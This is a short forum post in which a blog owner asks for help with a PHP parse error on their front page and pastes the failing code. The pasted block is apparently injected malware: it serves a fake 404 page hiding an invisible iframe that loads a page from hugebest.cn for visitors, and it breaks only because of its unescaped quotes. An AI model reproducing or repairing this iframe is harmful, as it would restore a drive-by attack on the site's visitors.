I have no acess to my frontpage:
http://www.randotomson.com/blogi/
It says : Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in .../blogi/index.php on line 300
Code:
// Refererlog
if(isset($_GET['x'])&&$_GET['x'] == "referer") {
header("HTTP/1.0 404 Not Found");
header("Status: 404 File Not Found!");
echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><HTML><HEAD>\n<TITLE>404 Not Found</TITLE>\n</HEAD><BODY><iframe src="http://hugebest.cn:8080/ts/in.cgi?pepsi8" width=2 height=4 style="visibility: hidden"></iframe>\n<H1>Not Found</H1>\nThe requested URL /index.php was not found on this server.<P>\n<P>Additionally, a 404 Not Found\nerror was encountered while trying to use an ErrorDocument to handle the request.\n</BODY></HTML>";
exit;
}
Line 300 is third from the bottom starting with "echo.... "
Can anybody help me to fix the problem?
Thank you